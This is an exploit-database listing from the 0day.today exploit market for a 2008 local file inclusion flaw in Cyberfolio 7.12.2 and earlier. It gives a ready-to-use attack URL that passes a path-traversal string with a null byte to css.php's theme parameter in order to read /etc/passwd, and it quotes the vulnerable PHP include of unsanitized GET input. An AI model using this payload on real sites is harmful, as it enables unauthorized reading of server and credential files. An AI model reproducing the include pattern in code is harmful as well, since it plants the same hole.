[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Cyberfolio <= 7.12.2 (css.php theme) Local File Inclusion Vulnerability

Author
dun
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4133
Category
web applications
Date add
08-11-2008
Platform
unsorted
=======================================================================
Cyberfolio <= 7.12.2 (css.php theme) Local File Inclusion Vulnerability
=======================================================================



  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun ]

 ##################################################################
 #  [ Cyberfolio <= 7.12.2 ]  Local File Inclusion Vulnerability  #
 ##################################################################
 #
 # Script site: http://cyberfolio.org/
 # Download: http://cyberfolio.org/Version-7-12-2
 #
 # Vuln: http://site.com/cyberfolio_7_12.2/portfolio/css.php?theme=../../../../../../etc/passwd%00
 #      
 # Bug: ./cyberfolio_7_12.2/portfolio/css.php (lines: 30-33)
 #
 # ...
 #		if (file_exists("./themes/".$_GET[theme].".php")) {
 #		    include_once("./themes/".$_GET[theme].".php"); 		// LFI
 #		    }
 # ... 	 
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************




#  0day.today [2024-11-16]  #